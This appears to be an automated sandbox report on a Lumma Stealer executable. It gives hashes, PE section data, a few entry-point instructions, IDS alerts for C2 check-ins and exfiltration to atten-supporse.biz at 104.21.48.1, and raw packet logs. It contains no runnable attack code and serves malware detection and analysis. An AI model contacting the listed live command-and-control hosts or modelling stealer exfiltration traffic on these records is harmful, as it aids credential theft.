                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: file.exe
                                                                                  TimeTypeDescription
                                                                                  16:35:00API Interceptor8x Sleep call for process: file.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.21.48.1SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.antipromil.site/7ykh/
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  atten-supporse.bizfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 104.21.64.1
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.64.1
                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                  • 172.67.165.166
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.165.166
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.165.166
                                                                                  SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.16.9
                                                                                  8GHb2yuPOk.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                  • 104.21.16.9
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.16.9
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUShttps://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5Get hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 172.67.139.78
                                                                                  GLAMPITECT++LTD+(PROPOSAL).emlGet hashmaliciousunknownBrowse
                                                                                  • 104.16.144.15
                                                                                  https://xxx.cloudlawservices.com/fROBJ/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.17.25.14
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 104.21.64.1
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.79.7
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.64.1
                                                                                  https://quiet-sun-5d9f.atmos4.workers.dev/loginGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.50.75
                                                                                  attachDocx.docxGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.48.1
                                                                                  8GHb2yuPOk.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  No context
                                                                                  No created / dropped files found
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.948081310283833
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:1'895'424 bytes
                                                                                  MD5:52f0f216dfbb86683b1e318a0796dd81
                                                                                  SHA1:2e2b8710e0a077ed8a2124fde2486f397857b8f6
                                                                                  SHA256:1d95373c2284b657b614f07051eed5fed72f34f787350409e49e8dc30a5ea494
                                                                                  SHA512:bf3bff59a42e2d10238306fe34f072c14bd482cac5c20563987a27174bf304a06cfc9c0b3914254f17695d80b006261b29ea025e2b31324ca3caeedf3da211cb
                                                                                  SSDEEP:49152:4Dkjoj13w8WgZENdIWFHmIy2LRwIi2CUMozodAh:4DjI/UWFHg2LRv1CUHoY
                                                                                  TLSH:0C9533F94D77E074D148187FE4368778F1766D7908AA729E2B803C1CE421FD264A9EAC
                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ug..............................J...........@...........................K...........@.................................\@..p..
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x8ae000
                                                                                  Entrypoint Section:.taggant
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6755B9EA [Sun Dec 8 15:23:22 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                  Instruction
                                                                                  jmp 00007F450C864EAAh
                                                                                  bswap edx
                                                                                  sbb al, 00h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  jmp 00007F450C866EA5h
                                                                                  add byte ptr [0000000Ah], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], dl
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [ebx], al
                                                                                  or al, byte ptr [eax]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [0300000Ah], al
                                                                                  or al, byte ptr [eax]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [edi], al
                                                                                  add byte ptr [eax], 00000000h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  adc byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add eax, 0000000Ah
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5405c0x70.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2b0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  0x10000x520000x24200405f3f86a324ebe0072ce2d4fffb54e8False0.997627865484429data7.97823310420282IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x530000x2b00x400fe67bb2a9df3150b9c94de8bd81ed8a0False0.3603515625data5.186832724894366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .idata 0x540000x10000x200f89f2f28be6f3fc6a464feb82ace12f3False0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  0x550000x2b10000x200cb84b4f0c589b9e95572e7b3e77c521funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  xyjapqsh0x3060000x1a70000x1a6c004912554c090dc3bf4a4983e95f3b433cFalse0.9942076156859846data7.953197683807969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  fjnsenoe0x4ad0000x10000x40029b9ef51b64269571d6326bf48f66073False0.7841796875data6.150005771609348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .taggant0x4ae0000x30000x22001f5dbc9a32aed1c42020a0ac6b8f5ceaFalse0.05710018382352941DOS executable (COM)0.7773013744355521IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_MANIFEST0x530580x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                  DLLImport
                                                                                  kernel32.dlllstrcpy
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-09T22:34:59.339141+01002057921ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)1192.168.2.5641601.1.1.153UDP
                                                                                  2024-12-09T22:35:00.868997+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.549704104.21.48.1443TCP
                                                                                  2024-12-09T22:35:00.868997+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.48.1443TCP
                                                                                  2024-12-09T22:35:01.920542+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.48.1443TCP
                                                                                  2024-12-09T22:35:01.920542+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.48.1443TCP
                                                                                  2024-12-09T22:35:03.184197+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.549705104.21.48.1443TCP
                                                                                  2024-12-09T22:35:03.184197+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.48.1443TCP
                                                                                  2024-12-09T22:35:04.551032+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.48.1443TCP
                                                                                  2024-12-09T22:35:04.551032+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.48.1443TCP
                                                                                  2024-12-09T22:35:06.084485+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.549706104.21.48.1443TCP
                                                                                  2024-12-09T22:35:06.084485+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.48.1443TCP
                                                                                  2024-12-09T22:35:08.226993+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549706104.21.48.1443TCP
                                                                                  2024-12-09T22:35:09.573683+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.549707104.21.48.1443TCP
                                                                                  2024-12-09T22:35:09.573683+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.48.1443TCP
                                                                                  2024-12-09T22:35:13.269460+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.549708104.21.48.1443TCP
                                                                                  2024-12-09T22:35:13.269460+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.48.1443TCP
                                                                                  2024-12-09T22:35:16.110444+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.549709104.21.48.1443TCP
                                                                                  2024-12-09T22:35:16.110444+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.48.1443TCP
                                                                                  2024-12-09T22:35:18.974676+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.549713104.21.48.1443TCP
                                                                                  2024-12-09T22:35:18.974676+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713104.21.48.1443TCP
                                                                                  2024-12-09T22:35:18.986057+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549713104.21.48.1443TCP
                                                                                  2024-12-09T22:35:23.317538+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.549722104.21.48.1443TCP
                                                                                  2024-12-09T22:35:23.317538+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722104.21.48.1443TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 9, 2024 22:34:59.645831108 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:34:59.645878077 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:34:59.645970106 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:34:59.647181034 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:34:59.647193909 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:00.868869066 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:00.868997097 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:00.873382092 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:00.873404980 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:00.873717070 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:00.926640987 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:00.927038908 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:00.927068949 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:00.927144051 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:01.920553923 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:01.920639038 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:01.920749903 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:01.922432899 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:01.922449112 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:01.922461033 CET49704443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:01.922466040 CET44349704104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:01.967072964 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:01.967108965 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:01.967171907 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:01.967448950 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:01.967464924 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:03.184102058 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:03.184196949 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:03.185331106 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:03.185339928 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:03.185565948 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:03.188386917 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:03.188420057 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:03.188456059 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.551043034 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.551130056 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.551177025 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.551194906 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.551208019 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.551234961 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.551254988 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.551263094 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.551315069 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.551518917 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.564131021 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.564199924 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.564205885 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.614280939 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.614285946 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.661112070 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.670238972 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.723496914 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.723504066 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.746784925 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.746834993 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.746841908 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.746906996 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.746962070 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.746965885 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.746988058 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.747036934 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.747143984 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.747143984 CET49705443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.747157097 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.747164965 CET44349705104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.870657921 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.870699883 CET44349706104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:04.870784998 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.871047974 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:04.871062994 CET44349706104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:06.084379911 CET44349706104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:06.084485054 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:06.092611074 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:06.092623949 CET44349706104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:06.092839956 CET44349706104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:06.103116035 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:06.103241920 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:06.103274107 CET44349706104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:08.227020979 CET44349706104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:08.227216959 CET44349706104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:08.227245092 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:08.227277040 CET49706443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:08.360970974 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:08.361011982 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:08.361068964 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:08.361365080 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:08.361376047 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:09.573570013 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:09.573683023 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:09.574879885 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:09.574886084 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:09.575153112 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:09.576366901 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:09.576477051 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:09.576504946 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:09.576585054 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:09.619334936 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:11.865319014 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:11.865427017 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:11.865938902 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:11.865938902 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:12.055341005 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:12.055386066 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:12.055457115 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:12.055746078 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:12.055763006 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:12.176628113 CET49707443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:12.176649094 CET44349707104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:13.269382000 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:13.269459963 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:13.271078110 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:13.271090031 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:13.271326065 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:13.272392035 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:13.272506952 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:13.272540092 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:13.272622108 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:13.272631884 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:14.562258005 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:14.562370062 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:14.562529087 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:14.562665939 CET49708443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:14.562676907 CET44349708104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:14.898574114 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:14.898616076 CET44349709104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:14.898685932 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:14.899059057 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:14.899070978 CET44349709104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:16.110248089 CET44349709104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:16.110444069 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:16.111900091 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:16.111910105 CET44349709104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:16.112139940 CET44349709104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:16.113540888 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:16.113651991 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:16.113657951 CET44349709104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:16.855899096 CET44349709104.21.48.1192.168.2.5
